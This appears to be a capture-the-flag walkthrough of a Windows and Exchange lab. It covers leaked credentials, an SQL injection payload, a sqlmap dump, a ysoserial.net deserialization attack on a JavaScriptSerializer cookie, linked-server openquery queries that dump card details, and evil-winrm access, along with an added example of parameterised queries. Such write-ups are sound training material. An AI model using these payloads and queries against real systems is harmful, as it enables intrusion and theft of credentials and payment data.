Since there isn't much to cover, I started by taking a deeper look at the web page itself.
The usual approach: going through every page and checking the page source, for example.
Flag
The flag was hidden under /Home/Staff. As soon as you check the page source you will find the flag and credentials for a user.
<!-- TODO: Set up Abbie on the portal, she'll be taking over my duties while I'm away.
Karl if I forget to do this, it's jay.teignton:admin for the portal
CONTEXT{CENSORED} -->
That shouldn't be there...
Enumeration
Using the credentials found earlier we are able to log in as administrator on the web page.
The first thing I discovered was the new management tab, where I'm able to add new products or remove current ones.
This screamed SQL injection in my face, and after some testing I could confirm that we indeed have a SQL injection here.
It can be verified by putting the following into the name or certified field:
'+(SELECT user_name())+'
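As an added illustration (my code, not the write-up's and not the lab application's), here is the concatenation pattern that lets '+(SELECT user_name())+' run as SQL, beside a parameterised version of the same insert. The products table, its name and certified columns, and the connection string are assumptions based on the fields mentioned above.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example, not the lab's code. Table, column names and the
// connection string are assumed for illustration.
public static class ProductRepository
{
    // Vulnerable pattern: user input is spliced into the statement text, so a
    // value such as '+(SELECT user_name())+' closes the string literal and the
    // subquery is evaluated by the server.
    public static string BuildInsertUnsafe(string name, string certified)
    {
        return "INSERT INTO products (name, certified) VALUES ('"
               + name + "', '" + certified + "')";
    }

    // Hardened: the statement text is constant and the values travel as typed
    // parameters, so the same input is stored as a plain string.
    public static SqlCommand BuildInsertSafe(SqlConnection conn, string name, string certified)
    {
        const string sql = "INSERT INTO products (name, certified) VALUES (@name, @certified)";
        var cmd = new SqlCommand(sql, conn);
        cmd.Parameters.Add("@name", SqlDbType.NVarChar, 200).Value = name;
        cmd.Parameters.Add("@certified", SqlDbType.NVarChar, 50).Value = certified;
        return cmd;
    }

    public static void Main()
    {
        string payload = "'+(SELECT user_name())+'";

        // The subquery becomes part of the SQL text.
        Console.WriteLine(BuildInsertUnsafe(payload, "yes"));

        // Placeholder connection string; nothing is opened or executed here.
        using (var conn = new SqlConnection("Server=(local);Database=webapp;Integrated Security=true"))
        {
            SqlCommand cmd = BuildInsertSafe(conn, payload, "yes");
            Console.WriteLine(cmd.CommandText);                 // statement text unchanged
            Console.WriteLine(cmd.Parameters["@name"].Value);   // payload carried as data only
        }
    }
}
```

The sizes given to Parameters.Add also cap what reaches the server, which is a cheap extra check for a field that should only ever hold a short product name.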
Exploitation
I used sqlmap with a request captured in Burp to dump credentials from the database.
The flag is found under user id 3 in the users table.
Have we met before?
Enumeration
I tried to use abbie.buckfast's credentials to log in to /ecp, which unfortunately didn't work, as Abbie isn't an Exchange admin.
A login to /owa worked.
There wasn't much to check, but the option to "open another mailbox" seemed interesting.
Exploitation
I checked the "People" tab to identify which users exist and have a mailbox.
In the end I was able to open jay.teignton's mailbox, which was obvious given that the comment from "But we have SSL!?" states that Abbie will take over his duties.
Flag
The flag can be found within Jay's mailbox in the Sent Items folder.
Is it a bird? Is it a plane?
Enumeration
After getting hold of Jay's OWA mailbox I was able to view a mail which had the web app attached to it.
Since there's nothing else to find, I will analyze the source.
One thing I always keep an eye out for is deserialization, and this time I was lucky to spot something easily.
_ViewStart.cshtml
@{
    Layout = "~/Views/Shared/_Layout.cshtml";
}
@using System.Text;
@using System.Web.Script.Serialization;
@{
    if (0 != Context.Session.Keys.Count)
    {
        if (null != Context.Request.Cookies.Get("Profile"))
        {
            try
            {
                byte[] data = Convert.FromBase64String(Context.Request.Cookies.Get("Profile")?.Value);
                string str = UTF8Encoding.UTF8.GetString(data);
                SimpleTypeResolver resolver = new SimpleTypeResolver();
                JavaScriptSerializer serializer = new JavaScriptSerializer(resolver);
                object obj = (serializer.Deserialize(str, typeof(object)) as Profile);
                // TODO: create profile to change the language and font of the website
            }
            catch (Exception e) { }
        }
    }
}
Exploitation
I'm used to doing everything on my Linux machine, but this time I had to switch to Windows to generate my payload.
I used ysoserial.net for it.
-- Will return WEB\CLIENTS
select * from master..sysservers
Get DBs
-- Will return clients db
select * from openquery("WEB\CLIENTS", 'select name from master..sysdatabases')
Get Tables and dump content
-- Get tables
select * from openquery("WEB\CLIENTS", 'select * from clients.INFORMATION_SCHEMA.TABLES;')
-- Dump content from table card_details
select * from openquery("WEB\CLIENTS", 'select * from clients..card_details')
That's where the flag was found.
It's not a backdoor, it's a feature
Enumeration
I couldn't find much on the DB itself, so I logged into OWA using Karl's account and found an e-mail that says:
Hi Andy,
I have added those restrictions on Jay, and added something to the database so I can generate a client list for him. Might be overkill but I don't want him wiping the DB again.
Cheers,
Karl
Now it was time to check the DB again for anything that could be used as this user.
-- Found C:\Users\Administrator\Scripts\clientsbackup.dll
select * from openquery("WEB\CLIENTS", 'select * from clients.sys.assembly_files')
Let's get that file onto my machine.
-- Export content as base64 encoded string
select cast((select content from openquery([web\clients], 'select * from clients.sys.assembly_files') where assembly_id = 65536) as varbinary(max)) for xml path(''), binary base64;
go
> binary.b64
I used ILSpy to decompile the DLL and check the source code.
You'll find a function called BackupClients there; this part holds credentials for the user jay.teignton.
Exploitation
Nothing to "exploit" here, just use evil-winrm to get access to the system.
Locating the flag wasn't as straightforward as I thought. Most of the time it's just a file on the Desktop or in another usual location.
After poking around I checked a file that seemed suspicious, called WindowsService.exe and located in the Documents folder.
# Will reveal the flag
cat .\WindowsService.exe
Key to the castle
Enumeration
whoami /all
# Basically we are an administrator at this point
Group Name ==========================================
BUILTIN\Administrators